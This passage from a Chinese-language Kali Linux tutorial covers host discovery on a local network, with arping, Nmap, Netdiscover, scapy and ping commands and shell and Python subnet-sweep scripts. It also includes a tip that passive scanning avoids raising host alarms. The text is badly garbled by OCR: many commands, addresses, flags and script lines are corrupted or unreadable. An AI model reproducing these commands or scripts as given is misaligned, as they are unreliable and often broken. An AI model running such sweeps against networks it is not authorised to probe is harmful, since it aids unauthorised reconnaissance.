-Cc 100-25-22-F9-5F-44 命 令 ， 执 行 效果 如 下 
图 所 示 O 


root@kali:-~# arping -C 1 99-25-22-F9-5F-44 

arping: lookup dev: No matching interface found using getifaddrs|(). 

arping: Unable to automatically find interface to use. Is it on the local LAN? 
arping: Use -i to manually specify interface. Guessing interface ethg0 . 

IARPING 688-25-22-F9-5F-44 

Timeout 


--- 00-25-22-F9-5F-44 statistics --- 
1 packets transmitted, 9 packets received, 199% unanswered (8 extra) 


确定 MAC 和 IP 的 对 应 情况 ， 使 用 
arping -c 1-T 192.168.1.100 00-25-22-F9- 
5SF-44 命 令 ， 执 行 效 果 如 下 图 所 示 。 
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50 bytes from lc:fa:69:01:2f:08 (192.168.1.1): index=0 time=272.866 usec | FE 提 
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rootGkaLi:-# arping -c¢c 1 -T 192.168.1.1606 066-25-22-F9-5F-44 
ARPING 960-25-22-F9-5F-44 


Timeout 


-- 99-25-22-F9-5F-44 statistics --- 
1 packets transmitted, 0 packets received, 10@% unanswered (9 extra) 


仪 提 示 : 如 果 想 要 确定 IP 和 MAC 对 应 情 
况 ， 可 以 使 用 arping -c 1-t 00:13:72:f9:ca:60 
192.168.1.15 命 令 来 确定 。 


有 时 ， 本 地 查 不 到 某 主 机 ， 可 以 
让 网 关 或 其 他 机 器 去 查 。 这 时 使 用 arping 
-C 1-S 10.240.160.1 -s 88:23a:92:12:c1l: 
cl110.240.162.115 命 令 或 者 arping-c 1-S 
10.240.160.110.240.162.115 命 令 都 可 以 ， 执 
行 效 果 如 下 图 所 示 。 


root@kali:-# arping -C1 -5 10.240.160.1 -5 88:5a:92:12:CL:C1L 18.240.162.,1]15 
arping: lookup dev: No matching interface found using getifaddrs(). 
arping: Unable to automatically find interface to use. Is it on the local LAN? 
arping: Use -i to manually specify interface. Guessing interface ethe. 

RPING 10.240.162.115 

Imeout 


-- 18.240.162.115 statistics --- 
1 packets transmitted, © packets received, 180% unanswered [9 extra) 


通过 Wireshark 工 具 抓 取 ARP 数 据 包 ， 

其 中 二 层 以 太 网 信息 如 下 图 所 示 ， 其 中 包 

括 目标 地 址 与 源 地 址 ， 可 以 看 出 目标 地 址 

为 广播 地 址 。 

~ Ethernet II, Src: Vmware_39:f2:9c (696:9c:29:39:f2:9c)，Dst: Broadcast (ffF:TfTf:TF:FTF:FTF:TF) 
Sour ct: ware 20:72:90 (06:06:20:39:72:90) 


Type:; ARP {gx050665) 
Trailer: 9666999996BBBBB8696669909090996BBBBB 


使 用 Wireshark 工 具 探 测 到 的 ARP 协 
其 具体 数据 如 下 图 所 示 。 


~ Address Resolution Protocol (request ) 
Hardware type: Ethernet (1 ) 
Protocol type: IPv4 (0Qx0800) 
Hardware size: 6 
Protocol] size: 4 
Opcode: request {1) 
Sender MAC address: Vmware_39:f2:9c (B00:0c:29:39:f2:9c) 
Sender IP address: 192.168.1.101 
Target MAC address: 60:00:00 00:00:00 (00:00:00:00:00:00) 
Target IP address: 192.168.1.1 


stp 加 当 目 标 地 址 存在 即 会 返回 MAC 地 
址 ， 如 果 不 存在 则 不 会 返回 。 返 回 的 ARP 
响应 数据 包 如 下 图 所 示 ， 这 就 是 对 探测 数 
据 包 进行 的 回应 。 
~ Address Resolution Protocol (reply) 

Hardware type: Ethernet (1) 

Protocol type: IPv4 (QOx0800) 

Hardware size: 6 

Protocol size: 4 


Opcode: reply (2) 
Sender MAC address: Tp-LinkT_ 061:2f:08 (i1ic:fa:68:01:2f:08) 


Sender IP address: 192.168.1.1 
Target MAC address: Vmware_ 39:f2:9c (00:0c:29:39:f2:9c) 
Target IP address: 192.168.1.101 


[step 贺 使 用 管道 利 选 可 以 截取 出 存在 主机 


的 IP 地 址 ， 这 时 使 用 arping -c 1 192.168. 
1.1|grep"bytes from"|cut -d" " -f Slcut -d 
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"("-f 2|cut -d")"-f 1 命令 ， 执 行 效果 如 下 图 
所 示 。 


root@kali:-# arping -c 1 192.168.1.1|1grep ' i from" || 
cut -d" " -f 5|cut -d"(" -f 2|cut -d")" -f 
192.168.1.1 


参数 说 明 如 下 : 
© ogrep “bytes from” : 
主机 。 
e cut-d“”-f$5: 是 以 空格 作为 区 分 
截取 第 五 行 的 信息 。 
e cut -4“(”-f 2: 去 除 IP 地 址 前 面 的 
"(" 括 号 ， 
© cut-d“)” -fl1: 
中 "括号 ， 
除 上 述 介 绍 的 内 容 外 ， 用 户 还 可 以 使 
用 shell 脚 本 来 实现 自动 化 扫描 ， 下 面 是 脚本 
文件 ， 该 脚本 遍历 eth0 网 卡 的 整个 网 段 ， 具 
体 代码 如 下 : 


是 截取 存活 


去 除 IP 地 址 后 面 的 


#!/bin/bash # 使 用 哪 种 脚本 进行 解释 固定 
格式 ,这 里 用 的 是 Bshell 

if [ "S$#" -ne 1 ]; then # 参 数 不 等 于 1 
给 出 提示 信息 


echo "Usage - ./arping.sh [interface]" 


echo "Excample - ./arping.sh eth0" 
echo “Example will perform an ARP 
Scan of the local Subnet to which eth0 


is assigned"™ 


exit 

fi 

interface=$1 # 第 一 个 参数 赋 给 
interface 变 量 

# 取 出 网 卡 信息 中 的 IP 地 址 


prefix=$ (ifconfig Sinterface | grep 
i 6 ge 1 ss es A ss el 

for addr in $(seq 1 254) ;do # 定 义 一 个 
addr 变 量 取 值 为 一 个 序列 遍历 整个 网 段 

# 将 IP 地 址 组 装 发 出 arping 包 

arping -©€ 1 Sprefix. $addr | 
"es eu 
二 

done 


还 可 以 编写 用 于 读 取 文本 的 脚本 ， 
脚本 可 以 读 取 指 定 文件 ， 并 扫描 文件 中 给 
定 的 耳 地 址 ， 有 具体 代码 如 下 : 


#!/bin/bash 
if [ "S$#" -ne 1 ] ;then 


grep 
cut “d < (> 


echo "Usage - ./arping.sh [interface]" 
echo "Excample - ./arping.sh file" 
echo “Example will perform an ARP 
Scan of the local Subnet to which eth0 


is assigned" 


exit 

fi file=$1 

for addr in $(cat S$file) ;do # 读 取 指 定 文件 

arping Cc LSsaddr | grep "byvtes 
下 下 站 可” uae dd =f egE gd “tt” = 和 2 


| cut -=-d")}" -f 1 
done 


( 侈 注意 : 执行 脚本 前 需 先 修改 脚本 文件 的 


执行 权限 ， 如 果 没 有 执行 权限 会 报错 ， 这 
里 可 以 通过 chmod 755 < 脚本 名 称 > 命 令 来 使 
脚本 具有 可 执行 权限 。 


10.2.2 ”使 用 工具 扫描 


在 二 层 扫描 中 ， 用 户 可 以 使 用 工具 
来 扫描 ， 下 面 介 绍 三 个 扫描 工具 的 具体 应 
用 ， 分 别 是 Nmap、Netdiscover 和 scapy。 


1. Nmap 工 具 


这 里 只 讲解 Nmap 在 二 层 扫 描 的 应 用 ， 
Nmap 有 很 多 相应 的 参数 ， 不 过 ， 在 二 层 扫 
摘 中 Nmap 不 做 端口 扫描 ， 下 面 介 绍 Nmap 扫 
描 工 具 在 二 层 扫 摘 中 的 具体 应 用 。 

[step 图 探测 主机 是 否 存 在 ， 这 时 可 以 使 用 
Namp -sn 192.168.1.1 命 令 ， 执 行 效果 如 下 
图 所 示 。 


root@kali:~/Test/2# nnap -Sn 192.168.1.1 

Starting Nmap 7.70 ( https:/,nmap.org ) at 2018-10-23 04:44 EDT 
Nmap scan report for 192.168.1.1 

Host is up (9.90654s latencyl. 

MAC Address: 1C:FA:68:0]1:2F:88 (Tp-link Technologies) 

Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds 


网 段 扫描 ， 使 用 Nmap -sn 192. 168. 
1.1-254 命 令 或 者 Nmap -sn 192.168.1.0/24 
命令 可 以 进行 网 段 扫描 ， 执 行 效果 如 下 图 
所 示 。 


nmap -Sn 192.168.1.1-254 
tarting Nmap 7.79 ( https://,nmap.org ) at 2018-10-23 04:47 EDT 


Nmap scan report for 192.168,1.1 

Host is up. 

MAC Address: 1LC:FA:68:01:2F:08 (Tp-link Technologies) 

Nmap scan report for 192.168.1.100 

Host is up [0.900022s Latency | . 

MAC Address: 900:25:22:F9:5F:44 (ASRock Incorporation) 

Nmap scan report for 192.168,1.101 

Host is Up . 

Nmap done: 254 IP addresses |3 hosts Up) Scanned in 7.01 seconds 
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和 阅 提 示 : 在 扫描 过 程 中 ， 用 户 可 以 发 现 使 
用 Nmap 扫 描 要 比 使 用 arping 脚 本 快 得 多 ， 
而 且 还 会 扫描 出 更 多 的 信息 ， 如 网 卡 型 
号 、 主 机 延迟 等 。 


读 取 文 件 ， 并 根据 文件 中 给 定 的 地 址 
进行 打 描 ， 使 用 Nmap -iL addr -sn 命令 ， 执 
行 效果 如 下 图 所 示 。 


root@kali:~/Test/2# nmap -iL addr -sn 

Starting Nmap 7.790 ( https://nmap.org ) at 2018-19-23 04:57 EDT 
Nmap scan report for 192.168.1.1 

Host is up (90.00082s Latency ) . 

MAC Address: 1C:FA:68:61:2F:08 (Tp-link Technologies) 

Nmap scan report for 192.168.1.190 

Host is up (90.00015s Latency ) . 

MAC Address: 90:25:22:F9:5F:44 (ASRock Incorporation) 

Nmap scan report for 192.168.1.191 

Host is up. 

Nmap done: 4 IP addresses [3 hosts up) scanned in 0.33 seconds 


2. Netdiscover 工 具 


Netdiscover 是 一 个 ARP 侦 查 工 具 ， 可 用 
于 无 线 网 络 环境 。 该 工具 在 不 使 用 DHCP 的 
无 线 网 络 上 非常 有 用 。 使 用 Netdiscover 工 具 
可 以 在 网 络 上 扫描 IP 地 址 ， 并 检查 在 线 主机 
或 搜索 为 主机 发 送 的 ARP 请 求 。 

具体 操作 步骤 如 下 : 
主动 打 描 ， 这 时 使 用 netdiscover -i 
eth0 -r 192.168.1.1/24 命 令 ， 其 中 -i 是 指定 网 
卡 ，-I 是 指定 网 络 地 址 段 ， 执 行 效果 如 下 图 
所 示 。 


Currently 5canning: FinIished' 


screen View: Unique Hosts 
2 Captured ARP Req/Rep packets, from 2 hosts Total size: 120 


IP At MAC Address Count Len MAC Vendor / Hostname 


192.168.1.1 lc:fa:68:01:2f:08 1 58 TP-LINK TECHNOLOGIES C0. ,LTD. 
192.168.1.199 809:25:22:f9:5f:44 1 658 ASRock Incorporation 


读 取 一 个 文件 并 扫描 文件 中 给 定 的 IP 
地 址 段 ， 这 时 使 用 netdiscover -i ech0 -] add. 
txt 命 令 ， 执 行 效果 如 下 图 所 示 。 


Currently scanning: Finished! | 


Screen View: Unique Hosts 
11 Captured ARP Req/Rep packets, from 3 hosts ， Total size: 660 
IP At MAC Address Count Len MAC Vendor / Hostname 
192.168.1.1 lc:fa:68:01:2f:08 5 3696 TP-LINK TECHNOLOGIES C0.,LTD. 
192 .168.1.109 30906 ASRock Incorporation 
192 .168 .1.102 606 GUANGDONG DPPO MOBILE TELECOMMUNI 


被 动 打 描 ， 使 用 netdiscover -i 
ech0 -p 命 令 ， 此 时 会 进入 被 动 模 式 
(passive) ， 并 扫描 出 当前 在 线 主 机 ， 执 
行 效 果 如 下 图 所 示 。 


800:25:;22:;19:;5f:;44 5 
dc:6d;cd:;66;fe:;cb 1 
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currently scanning: (passive)}) | Screen View: Uniqgue Hosts 


6 Captured ARP Req/Rep packets, from 2 hosts. Total size: 368 


IP At MAC Address Count Len MAC Vendor / Hostname 
192.168.1.100 600:25:22:f9:5f:44 2 120 ASRock Incorporation 
192.168.1.1 lc:fa:68:91:2f:98 4 249 TP-LINK TECHNOLOGIES C0. ,LTD . 


人 国 注 意 : 使 用 主动 扫描 可 能 会 引起 主机 报 


警 ， 此 时 可 以 采用 被 动 扫描 ， 被 动 扫描 不 
主动 发 送 ARP 数 据 包 ， 而 是 将 网 卡 置 入 混 
杂 模 式 收 集 网 络 中 的 数据 包 从 而 发 现 网 络 
中 的 主机 。 


3. scapy 工 具 


scapy 可 以 作为 python 库 进行 调用 ， 当 
然 也 可 以 单独 作为 工具 使 用 ， 它 可 以 实现 
抓 包 、 分 析 、 创 建 、 修 改 、 注 入 网 络 流量 
等 功能 。 

使 用 的 具体 操作 步骤 如 下 : 
在 Kali Linux 运 行 界面 中 执行 scapy 命 
令 ， 即 可 进入 scapy 主 界面 ， 如 下 图 所 示 。 
目前 使 用 的 最 新 版 本 为 5.8.0。 


root@kali:~# scapy 


HARNING: NO route found for IPv6 destination :: [no default route?) 
asPY//YASa 
apyyyy CY/////// /Yea | 
s¥Y//////YSp¢s scpCY//Pp | Welcome to Scapy 
ayp ayyyyYyYyySCP//Pp syY//C | Version 2.4.0 
AYASAYYYYYYYY// /Ps cY//S | 
pCCCCY//p cssps y//Y | https://github,.com/secdev/scapy 
SPPPP///a pP///AC//Y | 
A//A cyP////C | Have funl 
p///AcC sC///a | 
P////YCpe A//A | Craft me if you can, 
scccccp///pSP///Pp p//Y | -- IPv6 layer 
SsY/////////Y caa S//P | 
cayCyayP//Ya pY/Ya 
SY/PsY////YCc aC//Yp 
sc scCcaCY//PCypaapyCP//YSss 
spCPY//////!YPSpS 
ccaacs 
using IPython 5.8.0 


p>> 上 

初次 使 用 可 能 会 有 一 个 警告 WARNING: 
No route found for IPv6 destination :: (no 
default route?) 命 令 ， 这 是 由 于 缺少 gnuplot 
支持 。 这 时 ， 可 以 使 用 apt-get install python- 
gnuplot 命 令 来 安装 该 软件 ， 执 行 效果 如 下 
图 所 示 。 


HH apt-get install python-gnuplot 


在 读 取 软件 包 列 表 ..-. 完成 

在 分 析 软 忻 包 的 依 未 关系 树 

在 读 取 状态 信息 ... 完成 

列 软 忻 包 是 自动 安装 的 并 且 现 在 不 需要 了 : 

Libxz65-169 python-backports.ssl-match-hostname python-beautifulsoup 
ruby-terminal-table ruby-unicode-display-width 

用 'apt autoremove ' 来 部 载 它 (它们 )。 

列 【 新 】 软 件 包 将 被 安装 : 


python-gnuplot 

级 了 8 个 软件 包 ， 新 安装 了 1 个 软 忻 包 ,要 针 开 8 个 软件 包 ,有 5 个 软件 包 未 被 升级 . 
生 拉 | 83.4 kB 的 归档 ， 

庄 绽 后 会 消 半 687 kB 的 预 外 宇 间 。 


在 scapy 工 具 中 ， 使 用 ARP().display() 
命令 ， 可 以 显示 出 ARP 数 据 包 的 头 结 构 ， 
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如 下 图 所 示 。 其 中 ARP() 是 一 个 函数 ， 
displayO 属 于 ARPO 的 一 个 子 函 数 。 


>>> ARP().display!() 
彤 ## 关 [只 RP  ] ##### 


hwtype= 90X1 
ptype= Ox800 
hwlen= 6 
plen= 4 


op= who-has 

hwsrc= 00:0c:29:39:f2:9c 
psrc= 192.168.1.101 
hwdst= 00:00:00:00:00:00 
pdst= 0.0.0.0 


( 仪 提示: 通常 ，ARPO 在 使 用 时 可 以 先 定 义 
一 个 变量 ， 然 后 用 ARP() 为 其 赋值 ， 一 旦 赋 
值 完成 ， 变 量 便 具有 ARP() 的 功能 ， 例 如 : 
arp=ARPO， 定 义 变量 amp 并 赋值 。 


构建 查询 数据 包 ， 使 用 arp. 
pdst="192.168.1.1" 命 令 ， 构 建 一 个 查询 
192.168.1.1 的 数据 包 ， 执 行 arp.displayO) 命 
令 ， 执 行 效果 如 下 图 所 示 。 可 以 看 到 pdst 字 
段 已 经 被 修改 。 


>>> arp=ARPI() 

>>> arp.pdst="192.168.1.1" 
>>> arp.display() 

#### 大 [只 RP  ]###### 


hwtype= 90Xx1 
ptype= QOQx800 
hwlen= 6 
plen= 4 


op= who-has 

hwsrc= 00:0cC:29:39:f2:9c 
psrc= 192.168.1.101 
hwdst= 00:00:00:00:00:00 
pdst= 192.168.1.1 


[step 图 发 送 构 建 的 数据 包 ， 构 建 完 数据 包 
后 ， 可 以 使 用 Sr10 将 数据 包 发 送出 去 ， 执 行 
sr1(arp) 命 令 ， 执 行 效果 如 下 图 所 示 。 发 送 
数据 包 后 可 以 看 到 应 答 数 据 包 信息 ， 其 中 
op 字段 将 变 成 is-at 应 答 ， 源 地 址 目的 地 址 信 
息 也 会 改变 。 


>>> Srl(arp) 
Begin emission: 
..*Finished sending 1 packets . 


Received 3 packets, got 1 answers, remaining 9 packets 

<ARP hwtype=9xl1 ptype=gx80D hwlen=6 plen=4 op=is-at hwsrc=lc:fa:68:0 
1:2f:068 psrc=192.168.1.1 hwdst=00:0c:29:39:f2:9c pdst=192.168.1.101 | 
<Padding load='\x80\xAA\xOD\x00\xOO\xOD\xO0\xAO\ XO0\xO0\ xON\xAO\ X00\ 
xOD\x80\xOO\x0D\x00' |>> 


查询 返回 数据 包 信息 。 当 发 送 完 数据 
包 后 ， 会 返回 一 定 的 数据 ， 这 个 返回 的 数 
据 可 以 作为 信息 赋值 给 一 个 变量 ， 例如: 
answWeI=sT1(arp)。 通 过 使 用 answer.display() 
命令 ， 可 以 查看 返回 数据 包 的 信息 ， 执 行 


效果 如 下 图 所 示 。 


>>> answer.display!() 

尖 大 新 [ ”ARP  ] #### 

hwtype= 90X1 

ptype= 690x869 

hwlen= 6 

plen= 4 

op= is-at 

hwsrc= lc:fa:68:01:2f:08 

psrc= 192.168.1.1 

hwdst= 00:0cC:29:39:f2:9c 

pdst= 192.168.1.101 

#####[ Padding ]#### 

load= '\X909N\Xxg9g9\xgg\xoggovxgg\x9g9\Xx99\Xx9 
DB\XOO\xXOO\xXOO\xOO\xXOO\xOO0\xOO0\xOO\xOO\xOO' 


数据 包 的 发 送 与 显示 ， 通 过 一 条 指令 
可 以 完成 数据 包 的 发 送 与 显示 ， 该 命令 为 
srl(ARP(pdst="192.168.1.1")).display()， 执 
行 效果 如 下 图 所 示 。 

>>> Srl(ARP(pdst="192.168.1.1")).display!() 
Begin emission: 


Finished sending 1 packets. 
* 


Received 1 packets, got 1 answers, remaining 9 packets 
### [ARP  ]# 江 # 

hwtype= 9Xx1 

ptype= Qx800 

hwlen= 6 

pLen= 4 

op= 1S-at 

hwsrc= lc:fa:68:01:2f:08 

psrc= 192.168.1.1 

hwdst= 00:9c:29:39:f2:9C 

pdst= 192.168.1.101 
###[ Padding ]### 

load= '\x00\xQO\xQO\xOO\xXOO\xOO0\xO0\xOO0\xOO0\xO0\xO 

OQ\xO0\xOO0\xOO0\xAO\xOO\xOAO\xOO 


男 外 ，scapy 工 具 文 持 使 用 python 脚 本 
语言 调用 ， 下 面 给 出 一 段 调用 脚本 代码 。 
具体 代码 如 下 : 


#!/usr/bin/python  #python 脚 本 格式 

import logging # 导 入 日 志 库 文件 

import subprocess “ 间 导 入 系统 命令 调用 库 

logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 


# 设 置 日 志 等 级 
from scapy.all import * 
# 导 入 scapy 库 的 所 有 文件 
if len(sys.argv) !=2: # 如 果 输 入 的 参数 不 
等 于 2 做 出 提示 下 面 是 具体 提示 信息 
DTINE Usageq 0 arpedLlses ny 
[interfacel]™" 
Erint Example /arp dise py etno 
print "Example will perform an ARP 
Scan of the local Subnet to Which eth0 
is assigned" 
SYS .exit() 
interface = str(sys.argvl[lil1]) 
# 将 网 卡 参数 赋值 给 变量 interface 
# 执 行 ifconfig 命 令 从 中 筛选 出 信息 
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ip = SUbDproce ss Chnere re 
output{i ifconhg” i+” "tinterfacesr™ | oqrep 
"inet" ",shell=True) .strip() 
ip — ip- SI 1] # 截 取 IP 字 段 
Bretiz =— TO0 SOEd TiO 1 
SEE 
# 截 取 IP 前 三 个 字段 
for addr in range (0,254): # 定 义 循环 
ip=prefix+str (addr) # 构 建 IP 地 址 
# 下面 这 段 代 码 用 于 发 送 数据 包 ， 设 置 超时 时 间 
0.1ms，verbose=0 不 显示 错误 信息 
answer = Srl (ARP (pdst=ip),timeout= 
0.1,vVverbose=0) 
if answer == None: # 过 滤 掉 空 信息 
pass # 如 果 没 有 信息 过 滤 掉 
else: 


print ip  # 打 印 出 存活 主机 


除 此 之 外 ， 还 可 以 编写 用 于 读 取 文 本 
的 脚本 ， 该 脚本 可 以 读 取 指 定 文件 ， 并 扫 
描 文 件 中 给 定 的 耳 地 址 ， 有 具体 代码 如 下 : 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (lo0ogging .ERROR) 
from scapy.all import * 
If lenl(sys.argv) '=2: 
相让 ET 
[interfacel]™" 
print Ezannlieq Harp draec py 
下 SEE 二 在 天 在 
print "Example will perform an ARP 
Scan of the Local subnet to which eth0 
is assigned™" 
SySs.exit () 
filename = strl(sys.argv[1]) # 定 义 一 个 
变量 读 取 文件 名 
file = open (filename, 'r') # 以 读 的 形式 打 
开 该 文件 
for addr in file: # 每 次 从 文件 中 读 取 一 行 


answer = srl(ARP(pdst=addr. 
strip()),timeout=0.1,verbose=0)# 以 文件 中 
的 IP 地 址 发 送 
if answer == None: 
pass 
else: 


print addr.strip() # 将 有 返回 的 IP 进 
行 显 示 


10.3 ”三 层 扫描 
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是 可 能 会 被 边界 防火 墙 过 滤 掉 。 三 层 扫描 
主要 是 通过 IP、ICMP 协 议 来 进行 扫描 ， 理 
论 上 通过 三 层 扫描 可 以 发 现任 何 一 台 在 线 
的 主机 ， 当 然 前 提 是 它 接收 并 返回 相应 的 
IP、ICMP 数 据 包 。 


10.3.1 使 用 Ping 命 令 


Ping 指 的 是 端 对 端 连通 ， 通 常用 来 作 
为 可 用 性 的 检查 ， 但 是 某 些 病毒 木马 会 强 
行 大 量 远程 执行 Ping 命 令 来 抢占 用 户 的 网 
络 资源 ， 导 致 系统 变 慢 ， 网 速 变 慢 。 因 此 
大 多 数 防火 墙 的 一 个 基本 功能 便 是 过 滤 
Ping 数 据 包 。 

IP 协 议 是 将 多 个 包 交 换 网 络 连接 起 
来 ， 它 在 源 地 址 和 目的 地 址 之 间 传 送 一 种 
称 之 为 数据 包 的 东西 ， 它 还 提供 对 数据 大 
小 的 重新 组 装 功能 ， 以 适应 不 同 网 络 对 数 
据 包 大 小 的 要 求 。 


(全 注意 : IP 不 提供 可 靠 的 传输 服务 ， 
ee (路 由 ) 节点 到 (路 由 ) 

点 的 确认 ， 对 数据 没有 差错 控制 ， 它 只 
ea in 
控制 。 如 果 出 错 可 以 通过 ICMP 报 告 ，ICMP 
在 IP 模 块 中 实现 。 


ICMP 是 (Internet Control Message Pro- 
tocol) Internet 控 制 报 文 协议 。 它 是 TCP/IP 
协议 族 中 的 子 协议 ， 用 于 在 主机 、 路 由 器 
之 间 传 递 控制 消息 。 控 制 消息 是 指 网 络 通 
不 通 、 主 机 是 否 可 达 、 路 由 是 否 可 用 等 网 
络 本 身 的 消息 。 这 些 控 制 消息 虽然 并 不 传 
输 用 户 数据 ， 但 是 对 于 用 户 数据 的 传递 起 
看 重要 的 作用 。 

下 面 介 绍 Ping 命 令 的 使 用 ， 具 体操 作 步 
又 如 下 : 

在 Kali Linux 系 统 界 面 中 ， 执 行 Ping 
-h 命 令 可 以 查看 Ping 命 令 的 帮助 信息 ， 执 行 
效果 如 下 图 所 示 。 
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root@kali:~# ping -h 

Usage: ping [-aAbBdDfhLnOqrRUvV64] [-c count] [-i interval] [-I interface] 
[-m mark] [-M pmtudisc option] [-L preload] [-p pattern] {-0 tos] 
[-5 packetsize] [-5 sndbuf] [-t ttLl [-T timestamp option] 
[-w deadline] [-N timeout] [hopl ...] destination 

Usage: ping -6 [-aAbBdDfhLnoOqrRUvV] [-c count] [-i interval] [-I interface] 
[-L preload] [-n mark] [-M pmtudisc option] 
[-N nodeinfo option] [-p pattern] [-Q tclass] [-5 packetsize] 
[-5 sndbuf] [-t ttl] [-T timestamp option] [-w deadlinel] 
[-W timeout] destination 


如 果 需 要 执行 发 送 的 数据 pr 
这 时 可 以 执行 Ping 192.168.1.1 -c 3 命令 。 
中 ，-c 参 数 的 作用 是 指定 发 送 a 
执行 效果 如 下 图 所 示 。 


root@kali:~# ping 192.168.1.1 -Cc 3 

PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data. 

64 bytes from 192.168.1.1: icmp seq=1 ttl=64 time=0.940 ms 
64 bytes from 192.168.1.1: icmp seq=2 ttl=64 time=1.01 ms 
64 bytes from 192.168.1.1: icmp seq=3 ttl=64 time=1.22 ms 


- 192.168.1.1 ping statistics --- 
3 packets transmitted, 3 received, QO% packet loss, time 6ms 
rtt min/avg/max/mdev = 0.940/1.055/1.216/0.120 ms 


通过 Wireshark 工 具 可 以 抓 取 数 据 包 ， 
其 中 包含 源 地 址 与 目的 地 址 ， 以 及 ICMP 协 
议 中 的 Type 字段 ， 该 字段 为 8 个 ， 执 行 效 果 
如 下 图 所 示 。 


» Internet Protocol Version 可 ，SrC” T9272.168.1.191, Ust: 192.168.1.T 
v Internet Control Message Protocol 

Type: 8 (Echo (ping) request) 

Code: 日 

Checksum: Qxa4de [correct] 

[Checksum status: Good] 

Identifier (BE): 4461 (OXx1131) 

Identifier (LE): 12561 (Bx3111) 

Sequence number (BE): 1 (Ox0001) 

seguence number (LE): 256 (DxD106) 

[Response frame: 6] 

Timestamp from icmp data: Dct 24, 2018 23:47:35.00000060600 EDT 

[Timestamp from icmp data (relative): 0.885739416 seconds] 

» Data (48 bytes) 


查看 返回 数据 包 中 的 ICMP 协 议 ， 该 
数据 包 中 的 ICMP 协 议 Type 字 段位 为 0， 执 
行 效 果 如 下 图 所 示 。 


» InNnternet Protocol Version 4, SrC” 1T92.168.1.1, DSst: 
- Internet Control Message Protocol 

Type: © (Echo (ping) reply) 

Code: 0 

Checksum: ©@xacde [correct] 

[Checksum Status: Good] 

Identifier (BE): 4401 (Ox1131) 

Identifier (LE): 12561 (9x3111 ) 

Sequence number {BE): 1 (x0001) 

Sequence number {LE): 256 (Ox016g) 

[Request frame: 5] 

[Response time: 1.376 ms] 

Timestamp from icmp data: Dct 24, 2018 23:47:35.080000600 EDT 

[Timestamp from icmp data (relative): 9.887115143 seconds] 

» DaLa (46 byLcs) 


查看 到 达 目 标 地 址 经 过 多 少 跳 路 由 
器 ， 使 用 traceroute 命 令 可 以 查看 到 达 目 标 
地 址 经 过 多 少 跳 路 由 器 ， 执 行 效 果 如 下 图 
所 示 。 图 中 给 出 了 部 分 路 由 节点 ， 可 以 看 
到 当前 路 由 器 设置 了 ICMP 数 据 包 过 滤 。 


root@kali:-~# traceroute www.5aidu 
El to www-baidu.com (220. iel. 111.188), 38 hops max，66 byte packets 
于 

2 本 本 本 

3 + +*+* 
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traceroute (Windows 系 统 下 是 tracert) 命令 利用 ICMP 协 议定 位 用 户 的 计算 机 和 目标 

计算 机 之 间 的 所 有 路 由 器 ， 它 是 侦 测 主机 到 目的 主机 之 间 所 经 路 由 情况 的 重要 工具 ， 也 
是 最 便利 的 工具 。 使 用 traceroute 命 令 侦 测 主机 的 详细 过 程 如 下 : 

(1) 将 传递 到 目的 IP 地 址 的 ICMP Echo 消息 的 TTL 值 被 设置 为 1， 该 数据 报 经 过 第 
一 个 路 由 器 时 ， 其 TTL 值 减 去 1， 此 时 新 产生 的 TTL 值 为 0。 

(2) 由 于 TTL 值 被 设置 为 0， 路 由 器 判断 此 时 不 应 该 尝试 继续 转发 数据 报 ， 而 是 直 
接 抛 弃 该 数据 报 。 由 于 数据 报 的 生存 周期 (TTL 值 ) 已 经 到 期 ， 这 个 路 由 器 会 发 送 一 个 
ICMP 时 间 超 时 ， 即 TTL 值 过 期 信息 返回 到 客户 端 计 算 机 。 

(3) 此 时 ， 发 出 traceroute 命 令 的 客户 端 计 算 机 将 显示 该 路 由 器 的 名 称 ， 之 后 可 以 
再 发 送 一 个 ICMP Echo 消息 并 把 TTL 值 设置 为 2。 

(4) 第 1 个 路 由 器 仍然 对 这 个 TTL 值 减 1。 如 果 可 能 ， 将 这 个 数据 报 转 发 到 传输 路 径 
上 的 下 一 跳 。 当 数据 报 抵达 第 2 个 路 由 器 ，TTL 值 会 再 被 减 去 1， 成 为 0。 

(5) 第 2 个 路 由 器 会 像 第 1 个 路 由 器 一 样 ， 抛 弃 这 个 数据 包 ， 并 像 第 1 个 路 由 器 那样 


返回 一 个 ICMP 消 息 。 


(6) 该 过 程 会 一 直 持 续 ，traceroute 命 令 会 不 停 地 递增 TTL 值 ， 而 传输 路 径 上 的 路 
由 器 不 断 北 减 该 值 ， 直 到 数据 报 最 终 抵 达 预 期 的 目的 地 。 
(7) 当 目 的 计算 机 接收 到 ICMP Echo 消 息 时 ， 会 回 传 一 个 ICMP Echo Reply 消 息 。 


过 滤 网 络 中 存活 主机 的 IP 地 址 ， 使 用 
Ping 192.168.1.1 -c3 | grep "bytes from" | cut 
-d""-f4|cut-d":"-f1 命 令 ， 可 以 将 网 络 中 
存活 主机 的 卫 地 址 过 滤 出 来 ， 执 行 效果 如 下 
图 所 示 。 


root@kali:-~# ping 192.168.1.1 -C5 | grep "bytes from' 
| cut -d"" -f4 | cut -d":" -f 1 

192.168.1.1 

192.168.1.1 

192.168.1.1 

192.168.1.1 

192.168.1.1 


通过 上 面 过 滤 的 特性 可 以 编写 一 个 目 
动 化 Ping 的 shell 脚 本 。 具 体 代码 如 下 : 
#!/bin/bash 
if [ "S$#" -ne 1 ] ;then 
echo"Usage-./Pingl.sh [interface]" 
echo"Excample-./Pingl.sh 192.168.1" 
echo"Example will perform an ICMP 
scan of the 192.168.1.0/24 range " 
exit 
fi 
prefix=$1 
for addr in $(seq 1 200) ;do # 循 环 发 送 
Ping 命 令 到 地 址 段 


Ring G1 Spreftfix.$addr | grep 


二 二 
1T 一 ll 和 一 广 i 
done 


当然 也 可 以 编写 一 个 通过 读 取 文件 来 
进行 扫描 的 shell 脚 本 。 具 体 代 码 如 下 : 


#!/bin/bash 
if [ "S$#" -ne 1 ];then 
echo"Usage-./Ping2.sh [interfacel]" 
echo"Excample-./Ping2.sh file" 
echo™" Example will perform an ICMP 
scan of the file in range " 
exit 
fi 
file=$1  # 定 义 一 个 变量 将 参数 赋值 给 变量 
for adqr jin $(cat sfile) ;do # 读 取 文 件 
中 的 内 容 ， 每 循环 一 次 读 取 一 行 
Ping -c 1 S$addr | grep "bytes from" 
EEC 二 全 
done 


10.3.2 ”使 用 工具 扫 搞 
